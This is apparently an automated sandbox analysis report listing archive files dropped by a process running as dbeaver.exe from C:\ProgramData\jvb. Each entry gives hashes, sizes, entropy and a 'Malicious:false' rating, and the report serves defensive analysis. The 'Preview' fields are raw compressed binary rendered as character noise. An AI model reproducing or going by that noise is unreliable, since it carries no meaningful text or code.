      Preview:PK.........a/W................META-INF/MANIFEST.MF.|Y........(..>.|3...uTR3.`....#f0.h.x.Y.Y...[..1kE.X1|.+..i.v.'3l..*........T..}.|".....1,.!Z?I.......A.i.|:..'...e..v.....2.)./_In............o...<.....s..i....._.].....K.8..e.?.v.s..R.gh....#....C.O.....H.}:.}...z~U.X..@....W.Vc...7........x._.2S]..'..37........f...._..#-..-...X.O..^.....g..'./...Yj.......g........+.....s....>....|b.R....~..^f...J...d..j...P.i...[f.f(.?..Nu.v.....]fZ.....6u.<........<v....A....$o..6.R.^9.{..),......./..0S.....rL.,.....;.:..f...W.2..I.....h..>_..WC.Z...ia../._.....I.......O.o.Y./.}.s....va.....^d...W.....>}.......n....no..!......Z..i...@..">.Y#..C.M...6.}....o..........?....&..!. .sh.,:.\Z..........Cg.O0..D...~....l.(0!Mq.n.J.N.'.).Y..+.fFL.?.-kz..0.......^z...~.v._..kV.b.N...s`j_..8[A......=.....3...gO.y*....&....py...l.{.Zi..*.a.D.."....X..e).V.....l.}w....;...S2.P..&.W.8G2.>.W?...[v).({.............p..M..d....)........6nb..d...Yk...)._y.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):111722
      Entropy (8bit):7.829917021427927
      Encrypted:false
      SSDEEP:
      MD5:DC9FB8C95DD7B7E587CCB8BADF947D86
      SHA1:AB0509E97F27B90370831216DFCBAC8D4756BD76
      SHA-256:05EEE63AFB7506BC2A2AA24375AC03E026B0AC03478AA4E75117EF88F1816A22
      SHA-512:A08D7CC95AC103E85433AE1657F094FB6AF2A7A5E711F5FD72B48A4DB6A8CCFA799A0E9643E612F1BC68E6B872317D4F22A93629C0D119790EB654D1C6496769
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_de.properties.XKo.8...W.X ..2...9.....6..N.,|..R.+......*R....73.FK..X....>...C.X..j..X..3".N..Of.X.\...R..\A&Eca...C.H.....9.rnr...r.......B.U.M..{.s..7..\.+.xu..W..Z.....Xd.]"}..j@.u.kP...{...VW.M.yy.F).8a...D!...g|......L...H...@-:...y$g.~.u#Q..yx.Y.S..$h.{0n.R...*..v....!A.p0...0_?.aA*.xV.........{vwg...{.q.q.O............`3#.`...X...<..D_...x|.jD.~...z.}....#....'...=...R..m...g.%..?).....$v.`.Ad%(.!X.Q...0cQ.#.c.4,....0..B..<|WN8.......[IJ...2`... u..+.H6....B(A.V.."...(.b..T e./.....H..u9.;.f.......[`.{L..U.M.R..<{.&...z...5.......9%....qX.~L...O+....b.p.L(........Q:.U.L.b.D>......r].....B.H...X.....p....^..r,U...[...{>HP.6H..g .......+..^:...j......E.\....@..r .#j..%...F.|....'.2..2.V....i}..~...Q.p.r.C....#M..*..Hn...M..v.6....:H....m1.m.;|:`'..........X).o...Z.zJ..t.Y.&=....._...\.{..;`.3....x..<......._..#.P=..H.......YI...=.Ff.G.."W.^......B.s..i...k...... -..mJ0..=..Cg.%.+.u.... +.{..._..c(.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):627825
      Entropy (8bit):7.9064271264176895
      Encrypted:false
      SSDEEP:
      MD5:2B0FEA2C84729F37C9D9B2BEFD15B5BD
      SHA1:E775A47BF993AD12604128FB98D0131B57524FDD
      SHA-256:BCBF7C9FCB7487BF7671DCC1F3FEB4CBB341AB399B5813E6080E00ADC8CD4D72
      SHA-512:933D266DA1311AB21F6FEE10B0C8C26D583FDEF39F4F263C7AA0D3C0348E1FD575C4A43CAD99BBC2026F82AE69F00C744DA2ADDC0E9935AE6F29E92543D84DFA
      Malicious:false
      Reputation:unknown
      Preview:PK........P.fW................META-INF/MANIFEST.MF..Y..X.6z.F...."...|...JUT.A.AT.V9...}.......\.5....P`8.h......[7.jnU.y.....A..?d...........?...............a..zp._....6.k.....>=..#W_>:......."i.0.....yL.<...o...k'aQ....o..6yU...u.......OS._....o..7..~.V.j....+.A./.v.v....#........~k...~.C|#...o..4......5.s...)........s.L.........dz(..U4....W............i...W..........=....?|_....I?_..n..].~..v.i......ey..?{....t.....R.....?.;.....};._i;...6k......_.;o................3-..w..CQ.....G..s.7..Or....;....=...@...O..w}.....r...-.g...n.t.........2;......|.....O.....l...'^..V.y...o....................u.....79o+....}...PT..,...;?.......W...9....W.......f..M..'/..5./...8...o.....,u.._.8..)...9.6y:.....;.......U..._...y...s........a.i.._ 8...Z.Z....z.X^^./..?...[.[.].M............1....{S...,.......mi.p..Pg.n!{k.k.W........Q.s..f.k.r...........m.~.5.w.w../weJ...3/...m.vIn....N.z^&.%~]..T..F._.Pah;...F..........~....'..,.O[.??'...a
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):7338
      Entropy (8bit):7.058513956027841
      Encrypted:false
      SSDEEP:
      MD5:337B9DF95E6E6EFC631A29FECB8B99B2
      SHA1:A0B5B73D9CB7206C7B99BC010A6659F5570D7468
      SHA-256:04791CD7BFC785DC023D923C203696D950C9E9C4C1ACE281D67D2DCAFECCBACD
      SHA-512:7B65C8303B5DE6E05F784184C75CAF23C6F4B3D41FDE7DAE81C9DFB070952F49433C8B2DBBBC2147E493D52F943E10D35B3B77F5311A258ED96CB2EE9438C84A
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_ko.propertiesSVp./.,.L.(QH.T.M.TH..+).L*-./*.V(NMU.())...OJLJ..KM..,(N../J...K.M.u..(.&.Z..I.........."]d% MHL.PK..b..3e...~...PK........k.cX............4...org/eclipse/ui/internal/forms/Messages_ko.properties...J.1...}.. .i.i;....n,.).7w.4.I.L...T.?C.n..s.GNn....Sr..oI..%h.w..o]sO.!...z6.p.B..jU7.o......V....1.u.a....zq....h+.Rl h.R^.8.,.F.......P...0&g...R4.H........5T..v.......F;.F.&..dD?. *.e.....QFv...L*..{t....Y.........'.:[......<..+^F..:....VVJ-..Z8..{....../P...U.o2.F~.$.3`....Ce.oPK.....n,.......PK........k.cX................plugin_de.properties%.1.. ....W4q.v.............;x.pI..B4....W.i.a..........g.oN....~.X......22*.PK..mi) P...V...PK........k.cX............4...org/eclipse/ui/internal/forms/Messages_de.properties..MK.1.........z...."H...EX&q...|0I.E...j.......3..s.V!.B..J....>......U.s\V...<G.....j.......j......O~G.........X.ya....l.)..-.aJ......H__.[.`:!.e..[....9... ..=.cp.Z..90...e..G.....S...G.c......w
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):340676
      Entropy (8bit):7.928665635086109
      Encrypted:false
      SSDEEP:
      MD5:EBA1F8DC139D9414444EAF656910936C
      SHA1:B66900BB07A237C2BA16426696AEA748540FB589
      SHA-256:98AAEE41267042E6A5CC54487778EEDBAB08553C32C7A14DFF3EDA1E4BBB2E08
      SHA-512:FD83699C53B56FBF8927653A8D85DDBD964E8FCEF38EE73C92044F748745323D40C727567823A290278FCC2CA394F2AEB5BE58D8C7A8445F28B18D7B1B1781DA
      Malicious:false
      Reputation:unknown
      Preview:PK..........bW................META-INF/MANIFEST.MF.|W.........ab..a....37&b.!@.'....7.._T.v....ntG.B.y2O.....+.|.n>_......../...V..x.gf...y.ot.Q.U.._./...Q.~..g...y.q.......u..S".:Z...o.#..}....]....]Q._<'.....F_......Q..^3..gS.?.~..~......C ..a...C0....nQ...".>...}.Xi4Y..de..Q...qCYT.g.r.+XX..z............_....,..#7...e.7^5..7+.....=+}e..#........E.m.<.GF.l+...........3..}.#.*.O......2b....~......x.6.......8E.}...2.?..1v.........P_...}..@.s.._V..... ..1./.y..y....V?....."m_......._...F...g.o.o...).....o.2.~..a...2..y.7x......".f....Y*....t...,...C...-.u...g.h+.S<.....?~... j.........:l...2..4...j...7.E.N....<.?........|k......?...j.<..........?W.G.v......M.>FZ....fc.C.8.....u..:.e..#V..3..?..`..?~.%s....tA....ivp6v....*....D......q^....m.~S..e..|......D@VU..[.f.#..w6T_.../,..]PoZ..5k... .vzBp7..3.=..h.cTh`?-,r...x0.k....D..y.......M...;|.G....N..`....q...>.{._..(Y..TV..m..fq.x......%.sy.o)..R...8.z.o...4..XQZK....:.%..["G.W...VW^Q
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):6221
      Entropy (8bit):7.634079758857249
      Encrypted:false
      SSDEEP:
      MD5:ACB5163E28727E5EFA9E86F95F615F4A
      SHA1:163DB19699DA5462D88491BD6713AAD8B5EC6D87
      SHA-256:1AE4055EB0975042106C5F81563EBC559E7B13FF4C3BCFDBE78DA61F9A21EA85
      SHA-512:CD4DDFE20004A721EC7E84A1347ADBA907851D09AD86E2D5BEFB20CBFF611D4744C390A17DA8BB1FF172D43AB81BE3B91CDC162A2A126A162B94717A0A0ADE24
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_ja.properties.T.n.0...+.....8.lo..... .v...#...!.?..k.K1`....G.O......p.Cq../.lto*1..>..bx....j%@`.P.U.!k.a....Pi...{..>..?..a.A..EpV..-%.>N..X.i.+....3..,.....vl..v.4.i.......$T$..6.".Ko.TF. .._/.~6.. ...N9...F..X._h_P...}...+hU..x..........'...(...mQ..32.]3.[e.mg\..M]I..N...FSbJU8.L.M.....}E>.xd...,.y.......9.......z.".d...\.u...]H.J.&...i#9....iJw...$..p..`h....z`...v.K..f...l...E....M....c..{E.......&..-.f...*..........................H~&.>V.D|.x$..._vCn.`0x%98..QU.{...^T...E*a ...X..u.'..2....Nx..../j<;i.ib.<.........y....5..x&a........e.'.?PK..4M..I...M...PK........k.cX................plugin_it.propertiesuRMk.@........g..>......\.Yk....A......f..Cr...7..}.'..bp8....C.&|X......Y....x..hH\.B..k..D.JYy$..3...1._.kz#5..DBy..#i....>.+. @.R+....w.?Zq m..g..!.Z.4..V..W.^.,.....G...).?%?.....vR.7..|..!..$..2...*.O.u.....)%.au..2%.8...h..RG4z...t1.}...d.,....(..p..'.p..&...6...)a..#.?n.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):133318
      Entropy (8bit):7.911492918673673
      Encrypted:false
      SSDEEP:
      MD5:B9D865EE3D64B2DE67737CBBC52A948A
      SHA1:97B78C53204E94921C81821F12CEE0C2B70786E0
      SHA-256:537367A8597454EC6A113758CD61FA30F2B287052D41107266D86E3607B42C37
      SHA-512:2537FB17B4E70EBEF966C21B6CBF974E05F228991CB39CA1324C38F4FB3D153F860F0BB79FE756DA0FF06BBAB2865A3DCD9CA77824BFA390D454640DBF661446
      Malicious:false
      Reputation:unknown
      Preview:PK..........^W................META-INF/MANIFEST.MF.YY...~w..C.c...M.]...8.h..@..<8X.(..........z<=......*+w.V.=P......&..>.....U..~t.x.Z5H...`........F...{.....8..{YK...O<..$.m-..|..?=.|......y..4.....}.D0+@..}..e.Uv,?.0.#Pv.?......-.>.....I..)...i...M.w$.J.N.Z<G......A......w..+....kH?...#....K..N...}.....?.H..{.rR...JJ._...J...S.V...5j..u._..8]...M...j.[e.:..H.8..:..K.....?.t...y0..(A.........}.|JQh...8.W.....C/N<.u......;}. ..(.......>}.......&e...v.....T!X8..fJD.zI.L..|.n.d)*.u..-..yw.PbE/<......%..j:.h...v.{.....,\hE.....wR..Vh...X..S~......I=.NZ....=.y...S.}..>........T.p.(M...l.9.....N..[...E..j.....2..u.^M..[.|=2v...wo>8..<.:.....?.....eV|..wP.......,.J/E..oj..v..|.2......u8.>...q..A......?|.......t...8..=....E..k..K...Y8Az,C......`....UQ.....V......>..l.Y..4g.{.....r..;..@..6.#..6....^.Qb.*..{.Lr..J......~......6/B.....:..3.Lf^U.JX..).........S.Wuc...+.i.{.9...5..?.........zg..Hfi.U....mQ.....YE......`*.R....c.Y/a..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):343801
      Entropy (8bit):7.960055748803818
      Encrypted:false
      SSDEEP:
      MD5:C2D5F62D389B17C277772B6D54E5C4E9
      SHA1:F25EC4E37ABCF2E6F58375464F557DCE6DAE109A
      SHA-256:BB7C5FDA7392580D144A11ABFA56C15D3B2C0356FA116032344E449193C23193
      SHA-512:E3F91371B254F8119093360CD8D0A2159699CD90C4BE7708C1674C9B5B1FDD9C7EF0535F9B49EB6C16FD129A7E225313B81BC98835B94FFB205A581DCDBCF1C4
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_ru.properties.].o.F..]......Pe.......:}.k...6..@A.+./..GRv|..#.K.3.]rIQ....E.........5............>.WQ...r.Fq..q"..!M.?|...].`"V..M.$...]}N.#?L'.7.$.........sz......3-..........fB.gU=...._.Y}.7...G..qR.p.(.-.p..~V|....L...Og........Dd.s.%..O....I..R?.%.q.3x]..0.1..cZA..........bQ`.1..%.z..X .%....f...H=.X..j...;?HK..:0.x{U...g9f.....C'Md..m.Q.J..z..D4..\.K.~ n..Tl...q......i..l.......e....L.\$I....?<.8..(B.0.a.5....5.>..).G...c....q#.C..U...U...4..s..R..QA.h.1.......U...9\...?......fn.".....u,."..JL..B.).y.0.M.._.. :.E}..E....^`....ma..\.k..w....`.).s6<..b....!]..H2c2.(.U....e........k....`eg5.y......G..n.%..|+D....+9=N|.X.......%}......W..q....U....6_.q.........3..p.U..E...9.....b...J..../....L..p3.H..=<).......J#.k.1L...XA.%....... .../:ff<.8t.k....f..9.h....Z.5+"t.....V....#r.&VSZo..`Q>..d|B.\.9[.i5QI&x..C-.P.m.r.`.u../..u\.t..a~#..V..EpkM.2-..S.".h....".F..K.....U..&....]..Q... .qgD.....xb...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):2421893
      Entropy (8bit):7.929087427248358
      Encrypted:false
      SSDEEP:
      MD5:4CDF78FB89897EFA1A2056831C980842
      SHA1:3BFE963A4B9E83170F2FE5934EA8D8642BF7C393
      SHA-256:CE47388BCFD7A0CCDD7704BA67E73DF638E382D1ED78E7CC0EFC630AE64B4BD5
      SHA-512:E88DEE3A34EA2633AB9E1536CFA503129BF48D85CD98D502272AC7F421CB1BDC88D2FA033CC04E6571F2A9C1FF20CB4AFBF42261AA08E73D3218C5414B19273C
      Malicious:false
      Reputation:unknown
      Preview:PK..........bW................META-INF/MANIFEST.MF.....6z...;........ ........@.A..E.. &1....SeU%Je..[_t.$"........,....U.g........V.g..'=...`.^..U:a.z.o.o.7....n...s.^.T....o.en..)...6$...h.._..?R..Q.-..z.J.R;O"..'y.|.$**.[.}.\._.UQ.$^=...l.?.6....|.....,`.B..!...SG.U..g.WfVr....z^^l/s.g:..a.K.Q:.Mb..;:2.6....e.N#......D..(..V.L..E^..J.s.._^..~..rnOW?..F....oI....D........7..)J<e.j/......|.n......".4._....!...V.i%~.)..(.....t.......l..L..~..'.Qy...9.}...g.<M.....O#}...%..:.......w...}..........&.n<Y..{..?.F....FJs.K>z..4....DU]._....TL#.'.L..U...g..*/^_$y...<._NB"..f...^R<o..+;....a.../?y..HO/w.Sfh{.....?..$?...#.Y.e...U]n..9.....h7.....Vm..U.Wv...._..6..$......M..Q.y......3.....M..VY...8.._.}.r.i...U....i.......w...6...R..6...uqo..L....J..gu..&v...]!..~...3......?.o......0.o.....~.4O...yq.......du.z..H.$....._.}'..y.....A^.......GS.o...~..o?.:.....}.y.>...=t...>_....[....+5.t..?/..X|..i.;d..$..o....&....!.i.....B..S..nL.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):19884
      Entropy (8bit):7.680203566787806
      Encrypted:false
      SSDEEP:
      MD5:0B726F85BE4B24E6430FFBFA5B9241FF
      SHA1:22718ED2D11666F02BBB77FBC6550AAC8E6CA554
      SHA-256:C7A390C627A123E79E6CE595689FD3E2BA676389BD881DAF017CEA462151C25B
      SHA-512:CC5BEC5D3A6517B704165C96696A9C1CEC2C782370F9458047BF1C8F5BE7713832201AEF52B12BA88D18F6EFDEDA8E44371B0A6E152CEA76EC00C73A0D240FF9
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................empty_swt_it.properties...N.0...{.h.8..C..'n.qA...k,.8$.Pyz\4.j...nV......1......S...~05{.X..1..`.H....V@..!A....B.ag[(..........z._..u.:K."./+T...D +..o..{.s.b..59G.wQ._........{.|..w>..z.8..B.Vx.F....x.-=a#.\..8.YJ.,..>.[.o.g....t...... ..~@...o...g....'...W.+..,..Zw...Z..7`]`.46"...$.ae....R.1..?..H2Z..wm.....A..PK..O..^2.......PK........k.cX................plugin_it.properties..1..0.E....{....`..(IMk........;.m}.....$.J..-0Y^..g%7g.t...c.q..:..}....m..<...N.].."....!?.kF.U...L.../;.&4....Y....@.C.y.6....S..s.&...8.U?^.<E..|aL..B.7X..PK..Ug.........PK........k.cX............9...org/eclipse/ui/internal/intro/impl/Messages_it.properties.UMO.8.....f....W.r...H...3{A.*v%].qem..f..}.N.:,....~.....Zr.....w...S.].T..}....Z.....P.-P[........m@_....!FvUd....J......y.....=B....*.Zc..........G.F.o!.m..Y.k.-.....r.T>.....%hM..u./+..@'<(.V.......f7.t.Z..P.4a<.A...#.....-^.Xn+....E..eZJh..3}..*..v..m6..38..G.|.....r..;z...u:.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):358289
      Entropy (8bit):7.916599020008584
      Encrypted:false
      SSDEEP:
      MD5:61F60305A338BC7CEBB9E2F7C81F93EE
      SHA1:281F16D5F44C445E5E73F00B28C4FF17E55ADC36
      SHA-256:C1837002CA162217E3FBD4C0090C6ACCA23C84E6C7B6E1174BC36AF3742AF326
      SHA-512:20A3049728EE230F87CD145604B8352603A84E566A322832EB318730A448827F49B3B38E15355CEB42967F0ADCE0B44305B6B0B045FB105CB8E8A8549D507763
      Malicious:false
      Reputation:unknown
      Preview:PK.........fW................META-INF/MANIFEST.MF.|Ys..............2....#. !&!f..C....y....lW..l..s...d....o.....S....n."..7......:p...DO...u. ....(..7..{.../..S...'..2.....o......c~...rKv......L.0.........X....HQ.....e.<t.C..u..oM..i..c.....w..<..0.>.0.#..b. x.~y...w.~k.....i..8+...z.<..b...._e].....2!......}..|~w=.E.~R\/q.7..~..O.:..j..../..._..X....nH...f@.......?w..G..e.f..>.}Z.{.~~1+. .k..MZ_P..`oQ?....U.{I...}^...!-\..)..^.'.q.y.........H..h..y.7G..`xd...r.....[......y.(.....g%.........H.c..+.S...w........?........'..z{E.<.]..Y....H.O....................|CQ.....m.x....O..5o@.v.6...>..w.5=.u....T.YsU.7^Co...m0^%.y....^...:...o_...)..N.A.Eo.{...'..........c.=..:...y...Mp{W_...'>.....d.z.....Ix...%.0{.. .\~~4..w.o...y.w.1{T.f~../m...ua?.6........z..ig..}.,....._iz....{..z}..q.....ru...O.....Q][d...m.w_..[J2..._>.EW{....z...........m..O.....8.....|*S....<.....{....t....;.xk...j......>....*...Y....K..%.-Q.#a.G0.D.K.&}.....`........z.2.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):23147
      Entropy (8bit):7.677323699272018
      Encrypted:false
      SSDEEP:
      MD5:F2491DBA73BAE50B46E0764FDB063B5A
      SHA1:3E099D1D172287EE17E333821A345D0E0DCFA081
      SHA-256:E124B32E9513FA869D2943AE0E69B984186B59F7AECC9C303C8510CEE0CE5AA5
      SHA-512:0E75A569BF261E9B99C093A6BA71A555C768E3C2FCADC1C8FD09FE89FDFEFD639BB311FD4000252F987BF83CB89B18D115A6073FBB5EB6E7BEF31D3D6FD71FF0
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX............B...org/eclipse/ui/internal/navigator/framelist/messages_ja.properties..Ak.@........%n.IK.M!%.^..Pv..H...+.......z....7s#..t.,.N@'.u..jgKh...N4...."....4..........O...$V..J.!.7./"..K3...T.-._.[.4]N.[......+.b&2..H..Qp...x......C<?..$pE..W..4.w.`.......)d..."k.(5...+..,..!....s1...7%..PK..5.[v........PK........k.cX............8...org/eclipse/ui/internal/navigator/messages_ja.properties.XMo.8...W.Y p..dS...A..v..A.n/..R..me.d...}...-.q..zQ....73...,._.l..8.3...'.....)..w...yn....+....e.g.Z.........u.7.z.....,.2..3v..Y.E.Y...r....l.......|..R..H.3.z.W.v=.z...n.>...u\e.0...|&+v....f.....Y4L~.?.R...f`....i.......6..]O....h.......7g..K'K...7G.'.._......k...jw|.'... t....#..Q.....X.t.....cV..ub....$..l....j#r.X.HJ..G^.V.....v..A.:...........$.....:.V./R...F....N~.....#...U.dU......J#.v.....'..Q..n..#..5..:. ..R..!.t.R.">j......i.....p.<.I..}.=.[."6.......4vpgA..7.......X........6+....t..s..:.....K...!-...e^_`.......1.I
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):19260
      Entropy (8bit):7.773628681142065
      Encrypted:false
      SSDEEP:
      MD5:638103334A155179946D5269A04C6A1B
      SHA1:F1B7257417955B78DC896F37C09EDB5436DDFFBC
      SHA-256:67E7FEF2DD10AE68F5A3F51473FD9A41F29C7100C49B6E35F123AD025AE45082
      SHA-512:305258DBC8A9B4040065DCC79BA42742E60F61504D084A4EEABF07890213E1EC7F54BAAA083F6A57455AB7955A8E50B8E353530D20F28146EBC61DAAF8231418
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_fr.properties.U]O.1.|.XQ...:.R.U.PJ....Pyh+...r.>.....}..|..Z.OQ|;;3.........I.a...0. ..N....>.!B.}...;.c..J.j...no..D....C[....y.Z..9.wb*.............u......$...=.. ...{4.lKt..|.Y..{i..........c.u.._.L.=...b..s+C.l..*k..[..F.u...Z[..D...Bi..2..y.R..d.....5.9.t...h0..D....#%.B..|.bC-.le[.th.l..Q....d<_..$y.."..dsn.-a>.....QS.(.UI...._$?.t..%.zC......o.|Wf.H.y.ra..........`._.i..j.h.....ZG.M.|.z......,.MUc.nC.z..jBV7.F.$.'...k..I...v@..%+....x...A.B'.,..z.}..!...t5O.#...j..U...|L...3.t.@.J..D....q.%b5..^d..K.D..@...e....+...t..1...`Z..qK...,/$.i.....&n..SB'.m.....l..&1.5.;Ni.....g.g..^.....;{..-...w.q.4;)E.`..E.W'j.7as..E......).3>n]=y...".DU..)W"...5.\H\|.m`.a....[.b.\...X...o.$vQJ.z.^8...H..PK....\j........PK........k.cX............I...org/eclipse/ui/internal/navigator/resources/plugin/messages_fr.properties.VMo.7...W.(....{iR,..Q...-.nr1...c...d9.,..........X..r......g.=y=_.1{.K.>.e...,...7..b..{{r2.30.PF;.....;o.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):184648
      Entropy (8bit):7.881681830684793
      Encrypted:false
      SSDEEP:
      MD5:65634BA93142BD8CBDD5E81192764BE6
      SHA1:41AC4F1A01495A1201248343B42B1EB41A5C119F
      SHA-256:981706F86598CFBE798351FAD103A498A824E58041BD1C6D260F39FF6250A39A
      SHA-512:2EB95B9F72A7E9EF941CC835C65938F945D373C1E3E892B743F93D895A031CD0DC9695FBB0904CD0E0C4C87B6BFE49A53250979FD12084E339064F7E56AB2757
      Malicious:false
      Reputation:unknown
      Preview:PK........#..W................META-INF/MANIFEST.MF.[Ys.X.}.....=..LY..I...#.@h.!@.C...}C...G............{n...M.F.;.(?.@^.i........".F...t..h. .D... .4}._.AW~d.....kx..~....,>.|...<...|.._JT.~....<R..L#.}%...`E~V.....Y..Q..C....-P....7...e^}.....|@`..Fat..(...b_.PV..W..,.'%..#...Cv..L._.... .<..k...B..W......m.K.7......Q>b.$0m...g.B..V!o!.........r..gvhXW,.)....'....71..A..i.....KJ.....b.......,....5.j.J.o.............{.6..YE}3.?.....:...`......V..xz.Js...........1...{/M.Y...].0.0H.{.2..D... .............h._w..W..@^.....i..p..<..y...%h.#..6......AR......s.+.{C.....A...G.....).}... ...W..{.'....X......4.AR~.....2._....._T.|>D..._...2....bjW/...L?....g...p@>..(.|*...._.../.4...a.1.$.s........m..z.......Qz..v.E.}..oW.)....6/......?..c....:.I.....O.. Px6C..g`f..fMa.&.A...r..S`i..._T......;p.f.^T...-X.r.0.@G.w...M\$..2.J..`..*q......9.z....#....qQ....\.i.=X.Q....7..C......o.$.u.\iu..)O:....N...w.q6...O3.. R.t.....8...Qx..O. IsQ/7tp.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):439128
      Entropy (8bit):7.884469456183713
      Encrypted:false
      SSDEEP:
      MD5:90EB7B4F52E478A77185C16C522784D7
      SHA1:32D10B981C6525BB528C8F59770BCEAA8E03D29F
      SHA-256:702B7DE1D24530A11611AF03D264597AD13A4FF4580C3DA0B71EB58762D4C1BB
      SHA-512:A2D3DCB6CD5BADEECF9955CBF494BC231F96C112CF14DC6664DD6E414DC8CA6DC9A4D1E6A71C7C0C4F0F82BA61FD64851C61DE5E9207EED89B16E47672863698
      Malicious:false
      Reputation:unknown
      Preview:PK..........SW................META-INF/MANIFEST.MF..Y..H.6z?f.....\...........hEHB:..iGh._.Aem]."..~.@..+....=D'..i.0......A..........?....N..Q.w.......}......S........w..~...i.........Ir....?J.Eq.).}...6en....-E.}..4...S......i..?.5q..A{{......o.!. .....z......?`...Hym....(q..u...$}..B.......__...>..Z...s.xv..t._...eQ..(..8...+.......6`..........o...O7..gi.>.ASt..4......._....d7../.|............'=3..QoOz.....y...'}`....=...8.]{n.oOzc..no[..~.7..4-.MX.8;........yL..I.{V.......t.._.....=Z...;?-..{._........T]\.....?.|...Ou..q...}....H......L~.....~.....(.i.W......?....e..g.._y....k.x..x{..?..#._......1.T..>..<.......?~P _$..F..n:(u.......n.?.......^...}^.c..u.....5^..(n.}i..7..>_:.63...Q....E}.p{.....v......N{..^........Z'....>.=.E%A....?...........F!o.B..y..#...B._.>..$...9..?^..E.|.....v.............l ......+........d>...............7.<.....|{....At...t......N..J.~....,P>TS.ck.2R5......F=\..tf.>E.ME..m......v..4^......M3.D.c].I
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):11116
      Entropy (8bit):7.512073397759808
      Encrypted:false
      SSDEEP:
      MD5:2DCEA46A028688D450027C09F24CF09E
      SHA1:A61ECB233AEFEEDD873DE8F064DF035BCE456FF3
      SHA-256:82187328FC94B06248077749E2154AA4DD1C22462182FEC599003D6B96CD9ABC
      SHA-512:2DE6032D45F586D877C6732D064E4605CD03A4910F0CF72841D176EE7CA6B99097C86053D11D743D7767EA7D96552ACA4C2F0F73DFC465C267980E8A04268443
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_it.propertiesE....@.E.}.../\..d.&.k+3.K.tFf^.......=..!...l.3..F..0.q...>.#D".C.j.iH..v........B..t.L8..R.X..E...w.b...8.U..8c....G..e...........(sl.........1}.PK..............PK........k.cX............2...org/eclipse/ui/internal/net/messages_it.properties.T.n.0...+.(..=(..v...h.-...@A.ky..$H........9J;\.......xjV...h..@mM.....=.DX..&....@]b...,.o.......=...q...1..wM.=Lc...da...5.@.W..c1.>.l.D|.....l.L.F41_<.s..O.U...6.u.!(...,....bUAK..J.3._Z..Tcq..N..:~Epu".....6...2.B.g|&..j;.d.~....j.._....h..P...\...|.........=..G".}..'>...L.WO.5.+B.0.R....Y..>.,Sz...U.p!.Z....Po......Ip.B.!.....glb;m.K..X.k.I.......+..cq...d..a......c.h9...g.....?,....B..V.....]..I...'.{.....W...w&..%v..4...I...*....."..7VK`A....}..=....tA.....,&.....3.j&.V..o..Q........CV.F..<.e.....G......FrDI....Yc..X...=.......,.~j.0..?PK.....MK.......PK........k.cX................plugin_uk.properties.PM..0.....ao~4.n..a....P...bll......_.q1.q
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):48880
      Entropy (8bit):7.884486872354886
      Encrypted:false
      SSDEEP:
      MD5:80CA90E8708F9AFF71285D2507EA3FED
      SHA1:D2B8ED2059A137766F577AA6FCCFEB422CF09DF5
      SHA-256:3C6717E12D57B6D15CD0932D6230FB6EC18D00F8D01E749576CA423638D311AC
      SHA-512:24C599297EF79EB69DF1C83CF696CAEA773A386DE8DE90FF235FD1EBD5E2AC14B04A5513FE7896934802B0229674E9116A171997BCBED14929A042514E12C6E0
      Malicious:false
      Reputation:unknown
